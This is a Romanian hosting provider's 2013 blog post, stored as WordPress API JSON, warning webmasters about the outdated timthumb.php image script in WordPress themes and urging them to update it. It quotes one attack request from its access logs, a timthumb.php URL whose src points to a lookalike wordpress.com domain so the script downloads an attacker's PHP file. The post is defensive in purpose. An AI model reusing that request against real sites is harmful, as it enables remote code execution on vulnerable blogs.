{"id":6,"date":"2013-01-17T23:54:26","date_gmt":"2013-01-17T23:54:26","guid":{"rendered":"https:\/\/www.nettissimo.ro\/news\/?p=6"},"modified":"2013-01-21T03:59:57","modified_gmt":"2013-01-21T01:59:57","slug":"vulnerabilitate-wordpress-timthumb-php","status":"publish","type":"post","link":"https:\/\/www.nettissimo.ro\/news\/blog\/2013\/01\/17\/vulnerabilitate-wordpress-timthumb-php\/","title":{"rendered":"vulnerabilitate wordpress: timthumb.php"},"content":{"rendered":"

Blogurile WordPress au mare succes. Acesta este unul. Arat\u0103 bine, sunt multe module \u015fi teme care „iau ochii” vizitatorilor. Nu mai sunt simple bloguri, unele sunt chiar site-uri de prezentare a unui mic business. Se administreaz\u0103 u\u015for, se modific\u0103 u\u015for, \u00eenc\u0103rc\u0103m poze etc.<\/p>\n

Ceea ce nu \u015ftiu mul\u0163i clien\u0163i este c\u00e2t sunt de „v\u00e2nate” aceste bloguri. Au o mare supriz\u0103 c\u00e2nd se trezesc cu ele sparte, cu texte pornografice, cu mii de emailuri expediate de fi\u015fiere \u00eenc\u0103rcate de te miri cine pe blog. Am suspendat din p\u0103cate de-a lungul vremii c\u00e2teva asemenea bloguri. Reac\u0163iile au fost bine\u00een\u0163eles dintre cele mai iritate.<\/p>\n

Foarte multe teme populare pe internet folosesc un script numit timthumb <\/a>care la \u00eenc\u0103rcarea unui imagini o prelucreaz\u0103 pentru web. Variantele mai vechi ale acestui script sunt cunoscute de hackeri a fi foarte vulnerabile la injec\u0163ia de cod mali\u0163ios. \u00cen afar\u0103 de \u00eenc\u0103rcarea de imagini de pe calculator, Timthumb poate importa imagini de pe site-urile populare, cum ar fi wordpress, picassa sau photobucket pentru publicare pe blog. Totu\u015fi variantele mai vechi ale acestui script „uit\u0103” s\u0103 verifice cu aten\u0163ie adresa de la care import\u0103 imaginile, a\u015fa c\u0103 dac\u0103 un hacker \u00ee\u015fi creaz\u0103 pe site-ul s\u0103u un subdomeniu wordpress.com atunci gata, timthumb va importa un fi\u015fier de pe site-ul hacker-ului.<\/p>\n

\u00cen jurnalele de acces (sunt „obsedat” de securitatea acestora), am constatat un noian de asemenea \u00eencerc\u0103ride a sparge blogurile g\u0103zduite de serverele Nettissimo.<\/p>\n

De pild\u0103 hackerul acceseaz\u0103 urm\u0103torul link:<\/p>\n

http:\/\/adresa_blog\/en\/timthumb.php?src=http%3A%2F%2Fwordpress.com.erickcosta.com.br%2Fjahat.php<\/p>\n

\u015ei gata fi\u015fierul jahat.php este importat. Site-ul de pe care este importat nu este wordpress.com ci wordpress.com.erickcosta.com, dar varianta veche de timthumb nu verific\u0103 corect.<\/p>\n

Evident c\u0103 am instalat bariere pe server \u015fi c\u0103 serverul va bloca accesarea acestui link.<\/p>\n

Ve\u0163i zice: ce mare scofal\u0103 clientul s\u0103-\u015fi actualizeze versiunea de wordpress. Ei bine ve\u0163i fi uimi\u0163i c\u00e2te teme populare, mai mult sau mai pu\u0163in legal ob\u0163inute de webmasteri, con\u0163in o versiune veche \u015fi prin urmare vulnerabil\u0103 a fi\u015fierului timthumb.php. Actualizarea wordpress nu \u00eenseamn\u0103 neap\u0103rat \u015fi actualizarea temei respective folosite de webmaster, ceea ce \u00eenseamn\u0103 c\u0103 fi\u015fierul timthumb.php r\u0103m\u00e2ne tot vulnerabil<\/p>\n

Deci, stima\u0163i webmasteri, urgen\u0163\u0103 de gradul 0: c\u00e2nd instala\u0163i o tem\u0103 wordpress care „ia ochii” verifica\u0163i neap\u0103rat s\u0103 con\u0163in\u0103 varianta cea mai recent\u0103 a thimthumb.php. Ultima variant\u0103<\/a> poate fi ob\u0163inut\u0103 de pe pagina proiectului.<\/p>\n

Exist\u0103 un modul wordpress<\/a> care verific\u0103 dac\u0103 tema folosit\u0103 este vulnerabil\u0103. Folosi\u0163i-l cu \u00eencredere.<\/p>\n

Fi\u015fierul timthumb.php „se ascunde” de obicei \u00een tema instalat\u0103 de wordpress, ceva de genul:<\/p>\n

\/wp-content\/themes\/thedawn\/lib\/scripts\/timthumb.php<\/p>\n

Unde thedawn este directorul in care s-a instalat tema „The Dawn”.<\/p>\n","protected":false},"excerpt":{"rendered":"

Blogurile WordPress au mare succes. Acesta este unul. Arat\u0103 bine, sunt multe module \u015fi teme care „iau ochii” vizitatorilor. Nu mai sunt simple bloguri, unele sunt chiar site-uri de prezentare a unui mic business. Se administreaz\u0103 u\u015for, se modific\u0103 u\u015for, \u00eenc\u0103rc\u0103m poze etc. Ceea ce nu \u015ftiu mul\u0163i clien\u0163i este c\u00e2t sunt de „v\u00e2nate” aceste… Continu\u0103 lectura vulnerabilitate wordpress: timthumb.php<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[2],"tags":[6,5,4,3],"_links":{"self":[{"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/posts\/6"}],"collection":[{"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/comments?post=6"}],"version-history":[{"count":8,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/posts\/6\/revisions"}],"predecessor-version":[{"id":51,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/posts\/6\/revisions\/51"}],"wp:attachment":[{"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/media?parent=6"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/categories?post=6"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nettissimo.ro\/news\/wp-json\/wp\/v2\/tags?post=6"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}